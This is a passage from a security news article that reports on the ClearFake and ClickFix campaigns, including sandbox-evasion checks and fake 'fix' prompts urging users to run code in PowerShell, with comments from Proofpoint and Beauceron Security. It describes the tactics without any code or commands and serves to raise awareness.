However, to defeat detection, the scripts first performed checks to ensure the user was not operating in a virtual machine or sandbox (a common way for researchers to vet suspicious sites without compromising their machines); if a VM or sandbox was detected, the script exited without performing its malicious activities.
ClickFix
Another threat actor popped up a message saying something had gone wrong while displaying a web page, and (surprise!) the user should copy the code for a fix and install it using PowerShell. As with ClearFake, it provided clear instructions on how to “patch” the system. ProofPoint said that this exploit lasted only a few days before becoming inactive, and a few days later, it was replaced by the ClearFake exploit. “As the pley[.]es domain itself seems to be compromised, it’s unclear if these two activity sets – ClearFake and ClickFix – started to work with each other, or if the ClearFake actor re-compromised the iframe, replacing the code with its own content,“ ProofPoint said in its blog post. Regardless, the ClearFake compromise remains active on sites originally infected with ClickFix.
“The lures are effective,” said David Shipley, CEO and cofounder of Beauceron Security, “because they’re aimed at helping people, use language regular folks see but don’t understand (certificates) and look close enough to real dialogue buttons that if you’re busy, inexperienced, or feeling frustrated, look real enough.”
